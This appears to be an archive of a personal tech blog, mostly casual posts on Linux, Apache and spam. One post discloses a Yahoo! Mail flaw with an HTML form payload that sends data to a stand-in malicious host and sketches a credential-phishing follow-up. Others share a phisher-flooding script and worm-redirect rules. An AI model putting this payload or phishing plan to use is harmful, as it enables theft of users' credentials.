mcgees.org

Google Reader, for syndicated site feeds.  In Beta.  Good, needs a lot of work and a blogroll export feature.

Context: You’ve recently switched to apache2 with separate vhost configurations in sites-enabled and you are trying to get CGI scripts to execute in a directory called something other than “cgi-bin“.  You’ve turned on the ExecCGI option for the directory.

Symptom: You are getting “Access Forbidden” errors, and your server’s error log shows “Options FollowSymLinks or SymLinksIfOwnerMatch is off which implies that RewriteRule directive is forbidden”

Further context: You’re not running any RewriteRules.

Solution: Uncomment the line AddHandler cgi-script .cgi in your main apache2.conf file.

Reason this is the error you get: Hell if I know.

In closely related news, ScotchFinder is back.

If Blogger stopped publishing to your server four months ago, change (or ask your sysadmin to change) “PasswordAuthentication” to “yes” in your sshd config file (check /etc/ssh/sshd_config).

In related news, mcgees.org is back.

Last weekend’s upgrade, as it was intended, was unsuccessful. After setting all my installation options, RedHat told me it didn’t support my hardware. At least it had the grace to inform me before it reformatted my hard drive. So I took the burst of energy, the Mountain Dew, and the gummi worms, and applied them to getting the things that were bothering me fixed in my Debian installation. I succeeded in getting X running, a bit of a chore under Debian, switched out mouses, and upgraded all my packages. I wanted Firefox, so I used Konqueror to get the installer from the website. Konqueror wasn’t that bad, though, so I was on my way to Blogger to report that fact when Konqueror crashed. So go ahead and ignore that recommendation.

I couldn’t get the Firefox installer to run, so I looked around, and found the proper way was to set apt-get’s distribution to unstable so Firefox would show up in the list of packages and use dselect to install it.

This server runs Apache 2.0 under Linux.  I tried to archive an access log using mv mcgees_access_log mcgees_access_log.2, then I executed touch mcgees_access_log, assuming that Apache would continue writing to mcgees_access_log.  It didn’t.  My second guess would have been that it would start appending to mcgees_access_log.2.  It didn’t do that either.  Instead it stopped writing log files and I lost three weeks’ worth.  Restarting Apache fixes the problem.

Wow, I just received a 4-1-9 letter en français.  New export markets for Nigeria?

Ten years ago, Ron Avitzur was sneaking into the offices of his former employer, Apple, to continue development on a project that had been officially discontinued:

Q: Do you work here?

A: No.

Q: You mean you’re a contractor?

A: Actually, no.

Q: But then who’s paying you?

A: No one.

Q: How do you live?

A: I live simply.

Q: (Incredulously) What are you doing here?!

(via Richard Eriksson)

Joel has some interesting ideas on software pricing.

Google begins to digitize paper books.  Amazing potential.

If you install the Audible DownloadManager for iPod & iTunes, don’t spend a long time debugging why it doesn’t seem to do anything. Simply download a program from Audible, and it will automatically be added to your iTunes library. No documentation I’ve been able to find, but there you go.

I received a junk fax today advertising an undervalued stock. The disclaimer at the bottom of the fax informed me that the company sending out the faxes had received $219,965 to produce and distribute the “newsletter”. Good grief. If it’s not making the spammers rich, it’s making the telcos and the USPS some nice money.

It seems every year someone makes a statement about people not possibly needing the full extent of a new computing resources, but it always seems that needs grow to fill the void. So anybody want to play a game? Name an amount of storage that you think you will never need. I calculated it out, and NTSC-quality video of the entirety of your life would comfortably fit in a petabyte — that’s an application I could think of evolving, but it’s still not that resource-dependent, relatively speaking (modern hard disks, for instance, have a million times as much space as a floppy disk from 20 years ago. All we need is another factor of 10,000 or so.)

The total amount of information in the world was calculated some years ago to be 10,000 LOC, or 1 exabyte, or 1000 petabytes. So I cannot imagine needing more than 10 exa. What would I possibly do with all that storage? I don’t need full-motion video of the lives of everyone in the world. I don’t think, anyway. And aren’t network speeds supposed to reach the point where local storage becomes useless any day now?  (Prediction: it’s not going to happen.  Ever.)  So, 10 exa, that’s my number.

Processor speed, however, I cannot even imagine a number I couldn’t use. There are always mathematical applications that could grow to fill the need. That Sandia system can do 1.8 teraflops.  That’s not nearly enough.  I can see games eventually needing petaflop capabilities for rendering and physics models (I might actually turn into a video game player at that point.) But an exaflop: now really, what the heck would we use that for in our daily lives?

Checking [whether] standard error [closed in a Perl script], though, is a bit more problematic. After all, if STDERR fails to close, what are you planning to do about it? — The Perl Cookbook, 2nd Edition

They go on to suggest a couple of things, but it’s still a funny comment. By way of analogy, compare it to submitting a customer service request to a company saying that the customer service request system is not delivering any customer service requests.

On the very next page, it says “As of Perl v5.8 there is a way to mix [buffered and unbuffered I/O functions]: I/O layers. You can’t turn on buffering for the unbuffered functions, but you can turn off buffering for the unbuffered ones.” Great, really useful! I can turn off buffering on an unbuffered function and end up with: an unbuffered function! The presence of typos like this is really obnoxious, because when I find a confusing passage I have to wonder whether they are making a mistake or I’m just not understanding.

This ViewSonic sucks.  I’m buying a new monitor.  A flat panel.  Today.  Or Friday.

If you’re setting up sendmail, this page should help.

My XP box is unstable. My Linux box is slow. That gives me the choice of fast, unreliable browsing or slow, predictable browsing. I’m downloading Opera to see if that speeds things up a bit on the Linux box.

ASCII Art Stereograms.  For real.  The fact that this is possible makes my brain hurt.

Holy cow!  Did I actually get this to work?  Wow.

If you see this message, you are on the brand new mcgees.org server, running Debian 3.0r2. If you can see this, I’m very pleased with myself. If you can’t see this question, please let me know by email.

If you want some fun and have Perl installed, download my Perl script fuck_with_the_scammers.pl and run it. Some “phishers” sent me a fake PayPal message soliciting my email, PayPal password, credit card number, expiration date, CCV, and (get this) PIN number. Hard to believe anyone would be stupid enough to fall for it. Anyway, run this on your system and you’ll give them 1000 randomly-generated entries to sort through. It would be really useful if we could distribute this across multiple IPs. You’ll need my bigwordlist.txt as well, but that’s fun to have anyway.

A few unconnected notes:

1. Blogger has been redesigned.  Check it out.  You’ll like the round corners.
2. I got a modified CueCat barcode reader in the mail. Very cool, but I wish it would read in book UPC codes as ISBNs rather than UPCs.
3. I forgot how exciting it was to have auctions running on eBay.
4. The last post, my “feeling better” one, was the 500th mcgees.org post.

As a first-order approximation, all 41kB emails are viruses.

I know it’s one o’clock in the morning, but I want to do my bills right now and both my banking site and my loan site are down for maintenance. This doesn’t happen with paper, does it?

If you were wondering, it’s a pain in the neck to edit half-gigabyte bitmaps in Photoshop.  Every operation takes ten minutes.

Used to spam messages claiming “A special offer just for you,” I was vaguely amused by the subject of a message trapped by my filter, namely “We are sending this hot recommendation to millions“.  At last they had the decency to come right out and admit it.

It’s bad enough that I have to be spammed constantly with offers of pharmaceuticals.  The least they could do would be to figure how to spell “prescription”.

Another cool link discovered through Random TinyURL: Rhetorical Systems’ TTS demo.  Really, try it.  [wav]

I just found an exploit for Yahoo! Mail.  First, a little background:

If you receive an email with an HTML attachment, Yahoo! will give you the option to download it, but it will also render it inline, showing you the web page encoded in the attachment.  Yahoo! performs a couple of processing steps on the email to try to secure it: first, the text target=”_blank” onsubmit=”return ShowFormWarning()” is added to the <form> tag.  The target specification means that the requested page will show up in its own window and not take over your Yahoo! Mail session.  The onsubmit specification causes a pop-up dialog to appear, informing the user that he or she is about to send information to someone other than Yahoo!.  Yahoo! will also close the <form> tag if — and this is critical — it doesn’t think it has already been closed.  It apparently checks if the form is closed by searching for the text </form> after each instance of <form …>.

So here is the exploit: send an HTML attachment with </form> enclosed in a comment.  Consider the following as an example:

<form action=”http://www.malicious-site.com/track-email.cgi” method=”post”>

     <input type=”hidden” value=”Message_ID_123456_was_read_by_Joshua_McGee”>

<!– </form> –>

Here’s how it works: the Yahoo! Mail parser will check the message, find </form>, and assume everything is fine.  But now the form is not closed, so all further inputs that might be encountered are treated as belonging to malicious-site.com’s form.  This would not be a problem if Yahoo! coded their pages a little better, but two things make it a problem as it currently stands.  First, the mail page is bracketed by one big <form> tag to control the “Delete” and “Reply” (etc.) features.  Second, the “Delete” button is actually a “Submit” button for this form!

So let’s walk through an example.  I send you the malicious code above as an HTML attachment.  On the page that displays the email, Yahoo! opens one big <form> to control “Delete” and “Reply” functionality.  It renders the malicous code inline, so my code starts an (invisible!) form and inserts an (invisible!) tracking code.  I “end” my <form> tag with a </form> tag embedded in a comment.  Yahoo! checks to see if I have closed my nested <form>, wrongly determines that I have, and doesn’t add a </form> tag for me.  The next <input> encountered is the “Delete” button, which is really a “Submit” button.  But since the malicious <form> was never closed, it is a “Submit” button for the malicious <form>.  So when the user clicks the “Delete” button, expecting to have the message deleted, it instead sends the tracking ID to the malicious site.

“Now wait,” you’re thinking, if you are not totally lost already.  “This will trigger the ShowFormWarning() function.”  True.  But what’s the naïve user to think?  They are clicking a Yahoo! button, so how could it not be safe?  My guess is many users would just ignore the message.

I’m sure you could do more clever things: it might be possible to use Javascript to populate the invisible form with system data, for instance.  Or maybe the target url is a clone of the “Your session has expired, login again” screen.  You could even set the form action url to something like http://login.yahoo10.com/config/mail?.intl=us&.lg=us, assuming you owned yahoo10.com (it’s available.)  When the form data is submitted, then, a Yahoo!-looking window would pop up with a Yahoo!-looking URL asking for the user’s password.  Don’t you figure most people would enter it?  The malicious site now has your email address and password.  Then all the site would have to do, so as not to arouse suspicion, is bring up a Yahoo!-looking page that says “Invalid password”, but on this one have the form correctly set to send the data to Yahoo!.  Voila.

I’ve reported this bug to Yahoo!.

When the Code Red worm attacks, it tries to access the file default.ida to propagate itself across Microsoft IIS servers.  The Nimda worm does the same thing, except it tries to access root.exe and/or cmd.exe.  My server, running Apache, is immune to these exploits, but my site returns a 404 page in response and consumes my bandwidth in the process.  I could create an empty file and redirect all results to this file, but I get a deeper, more smug satisfaction by sending these requests on to Microsoft.  Let the worm eat up their bandwidth; it’s their sloppy programming that caused the problem in the first place.

To do the same thing yourself, add the following RewriteRules to your httpd.conf file:

RewriteRule     ^(.*default\.ida.*)$    http://www.microsoft.com$1 [R]

RewriteRule     ^(.*root\.exe.*)$       http://www.microsoft.com$1 [R]

RewriteRule     ^(.*cmd\.exe.*)$        http://www.microsoft.com$1 [R]

For more information on using RewriteRules, consult the Apache documentation.

(I have no idea if the worms actually go to the redirected URLs.  Anyone know?)

Read about RealDriver’s amazing full-sized cab simulator of a GP-38 for use with Microsoft’s Train Simulator.  They also offer a smaller train controller for use with this software and (soon) your model train set.

From I, Cringely: The Pulpit:

Finally, I am sorry to report this week the death of George Morrow, one of the early pioneers of personal computing.  Morrow started two computer companies of his own — Morrow’s Microstuff and Thinkertoys (later called Morrow Designs after the lawyers for TinkerToys objected) — and his computer designs were also built by Osborne Computing and Zenith Data Systems.  George was audited by the IRS, and the agent used a Z-171 computer that George designed.  The computer failed halfway through the audit, so George fixed it.